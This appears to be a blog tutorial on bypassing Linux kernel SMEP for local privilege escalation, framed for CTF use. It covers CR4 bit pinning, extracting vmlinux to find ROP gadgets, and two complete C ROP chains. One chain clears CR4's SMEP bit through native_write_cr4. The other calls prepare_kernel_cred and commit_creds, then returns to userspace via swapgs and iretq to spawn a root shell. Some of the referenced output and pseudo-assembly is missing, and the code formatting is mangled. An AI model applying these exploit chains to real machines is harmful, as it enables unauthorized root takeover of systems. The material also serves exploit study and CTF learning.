Supervisor mode execution protection (SMEP) is a mitigation introduced by google engineers in the Linux kernel that prevents ret2usr exploits from working. While in kernel mode (ring0) the process can not execute from pages in userspace. This is a hardware feature offered by intel chips and is controlled by the 20th bit in the CR4 register. The is the same mitigation on ARM devices, but it's called PXN. (Also see this article for Android)
One technique proposed through a google project zero post is to zero out the 20th bit of the CR4 register. To do this Andrey Konovalov used a func(data) primitive to call native_write_cr4(val) with val having the 20th (and 21st) bit set to 0.
This link to kernel source shows the function accept an arbitrary value and attempts to set the CR4 register to the value provided. However we can see that the function mentions some bit pinning!
It turns out that the kernel ensures that those values are not changed after the CPU is finished initializing and specifies just a couple lines above this function, which bits those are:
/* These bits should not change their value after CPU init is finished. */staticconstunsignedlong cr4_pinned_mask = X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP | X86_CR4_FSGSBASE;
These changes were introduced in Linux Kernel 5.1 here and prevent us from over writing those bits using this function. For exploits before 5.1 (for CTFs) we can still use this technique and we need to execute a two gadget rop chain to call this function.
We need the address to native_write_cr4 and a gadget to fill our RDI register as it will contain the argument the function expects. Using ROPgadget we can find a gadget and using either our leak from before or a read off of /proc/kallsyms, we can get the address of native_write_cr4
A quick note here on rop gadget finding for kernels. Make sure you're not running ROPGadget on the bzimage since that's the entire boot image containing the vmlinux kernel image. There is an extract-vmlinux script located inside of the kernel tree that extracts out the vmlinux kernel that we want to use to find our gadgets.
$./linux-5.4/scripts/extract-vmlinuxlinux-5.4/arch/x86/boot/bzImage>vmlinux$ROPgadget--binaryvmlinux>kernel_gadgets$catkernel_gadgets|grep': pop rdi ; ret'0x000000000003be1d:poprdi ; ret
Using these pieces we can construct a small ROP chain then ends with a jump into our give_me_root function:
unsignedlong pop_rdi_ret =0x3be1d;unsignedlong native_write_cr4_offset =0x2ddf0;voidoverwrite_pc(int fd,unsignedlong stack_cookie,unsignedlong kernel_base) {unsignedlong*buf =NULL; //[BUF_SIZE];unsignedint cookie_offset =16;int bytes_written; buf =malloc(BUF_SIZE);if (buf ==NULL)exit_and_log("Failed to malloc\n");memset(buf,'\x00', BUF_SIZE); buf[cookie_offset] = stack_cookie; buf[cookie_offset +1] =0x4141414141414141; // rbx buf[cookie_offset +2] = kernel_base + pop_rdi_ret; buf[cookie_offset +3] =0x6f0; // or 0x407f0 /* * 0x407f0 -> 0b1000000011111110000 * 0x6f0 -> 0b11011110000 */ buf[cookie_offset +4] = kernel_base + native_write_cr4;// Once SMEP is off, we can return to userspace pages again! buf[cookie_offset +5] = (unsignedlong)give_me_root;// After this write we won't return to the// rest of this function bytes_written =write(fd, buf, BUF_SIZE);printf("Write returned %d\n", bytes_written);free(buf);}
If SMEP bit is pinned
If the SMEP bit is pinned, then we can't overwrite that part of the CR4 register with our own payload and we need to ROP for our prepare_kernel_cred and commit_creds calls. The steps we need to take are straight forward. We need to implement the pseudo assembly as ROP calls:
Running the previous ret2user payload will result in the following panic:
The process of generating the rop chain given the kernel is pretty straight forward and you won't run into any road bumps. My code for the overflow is shown here and below:
// 0xffffffff8103be1d : pop rdi ; retunsignedlong pop_rdi_ret =0xffffffff8103be1d;// 0xffffffff81033b50 : mov rax, rdi ; retunsignedlong mov_rax_rdi =0xffffffff81033b50;//0xffffffff81c00eaa : swapgs ; popfq ; retunsignedlong swapgs_popfq_ret =0xffffffff81c00eaa;//ffffffff810240c2: 48 cf iretq unsignedlong iretq =0xffffffff810240c2;voidoverwrite_pc(int fd,unsignedlong stack_cookie,unsignedlong kernel_base) {unsignedlong*buf =NULL; //[BUF_SIZE];unsignedint cookie_offset =16;int bytes_written; buf =malloc(BUF_SIZE);if (buf ==NULL)exit_and_log("Failed to malloc\n");memset(buf,'\x00', BUF_SIZE); user_rip = (unsignedlong)drop_shell; buf[cookie_offset] = stack_cookie; buf[cookie_offset +1] =0x4141414141414141; // rbx buf[cookie_offset +2] = pop_rdi_ret; buf[cookie_offset +3] =0 ; // Argument for prepare_kernel_cred buf[cookie_offset +4] = prepare_kernel_cred; buf[cookie_offset +5] = mov_rax_rdi; // move cred struct to argument buf[cookie_offset +6] = commit_creds; buf[cookie_offset +7] = swapgs_popfq_ret; buf[cookie_offset +8] =0xDEADBEEF; // value for popfq buf[cookie_offset +9] = iretq; // swap from kernel to userspace buf[cookie_offset +10] = user_rip; // <-- here is drop shell function buf[cookie_offset +11] = user_cs; buf[cookie_offset +12] = user_rflags; buf[cookie_offset +13] = user_sp; buf[cookie_offset +14] = user_ss;// After this write we won't return to the// rest of this function bytes_written =write(fd, buf, BUF_SIZE);printf("Write returned %d\n", bytes_written);free(buf);}